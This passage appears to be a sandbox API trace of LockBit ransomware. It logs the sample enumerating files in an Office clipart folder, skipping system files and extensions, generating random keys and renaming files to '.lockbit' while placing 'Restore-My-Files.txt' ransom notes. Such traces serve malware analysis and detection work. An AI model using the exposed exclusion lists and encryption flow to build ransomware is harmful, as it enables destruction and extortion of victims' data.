nFileSizeHigh=0x0, nFileSizeLow=0x1708, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00941_.WMF", cAlternateFileName="")) returned 1 [0176.110] lstrcmpiW (lpString1=".", lpString2="SO00941_.WMF") returned -1 [0176.110] lstrcmpiW (lpString1="..", lpString2="SO00941_.WMF") returned -1 [0176.110] PathFindExtensionW (pszPath="SO00941_.WMF") returned=".WMF" [0176.110] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.110] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.111] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.111] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00941_.WMF") returned -1 [0176.112] lstrcmpiW (lpString1="ntldr", lpString2="SO00941_.WMF") returned -1 [0176.112] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00941_.WMF") returned -1 [0176.112] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00941_.WMF") returned -1 [0176.112] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00941_.WMF") returned -1 [0176.112] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00941_.WMF") returned 1 [0176.112] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00941_.WMF") returned -1 [0176.112] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.112] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF") returned=".WMF" [0176.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.113] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.113] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.115] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.116] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.116] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF.lockbit") returned 72 [0176.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00941_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.124] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.124] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.124] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5896) returned 1 [0176.124] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.125] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.125] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.127] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.127] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.127] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.129] free (_Block=0x1fa2ed8) [0176.129] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.129] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.129] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.129] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00942_.WMF", cAlternateFileName="")) returned 1 [0176.134] lstrcmpiW (lpString1=".", lpString2="SO00942_.WMF") returned -1 [0176.134] lstrcmpiW (lpString1="..", lpString2="SO00942_.WMF") returned -1 [0176.134] PathFindExtensionW (pszPath="SO00942_.WMF") returned=".WMF" [0176.134] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.134] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.134] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.134] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.134] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.134] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.135] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.135] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.136] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00942_.WMF") returned -1 [0176.136] lstrcmpiW (lpString1="ntldr", lpString2="SO00942_.WMF") returned -1 [0176.136] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00942_.WMF") returned -1 [0176.136] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00942_.WMF") returned -1 [0176.136] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00942_.WMF") returned -1 [0176.136] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00942_.WMF") returned 1 [0176.137] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00942_.WMF") returned -1 [0176.137] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.137] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF") returned=".WMF" [0176.137] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.137] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.137] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.138] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.138] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF.lockbit") returned 72 [0176.138] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.139] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.139] malloc (_Size=0x40068) returned 0x3d70450 [0176.140] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4708) returned 1 [0176.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.141] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.143] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.143] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.143] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.145] free (_Block=0x1fa2ed8) [0176.145] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.145] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.145] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d84, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00943_.WMF", cAlternateFileName="")) returned 1 [0176.145] lstrcmpiW (lpString1=".", lpString2="SO00943_.WMF") returned -1 [0176.145] lstrcmpiW (lpString1="..", lpString2="SO00943_.WMF") returned -1 [0176.145] PathFindExtensionW (pszPath="SO00943_.WMF") returned=".WMF" [0176.145] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.145] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.145] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.146] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.147] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.147] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00943_.WMF") returned -1 [0176.147] lstrcmpiW (lpString1="ntldr", lpString2="SO00943_.WMF") returned -1 [0176.147] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00943_.WMF") returned -1 [0176.147] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00943_.WMF") returned -1 [0176.147] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00943_.WMF") returned -1 [0176.147] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00943_.WMF") returned 1 [0176.147] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00943_.WMF") returned -1 [0176.148] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.148] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF") returned=".WMF" [0176.148] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.148] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.148] lstrcmpiW 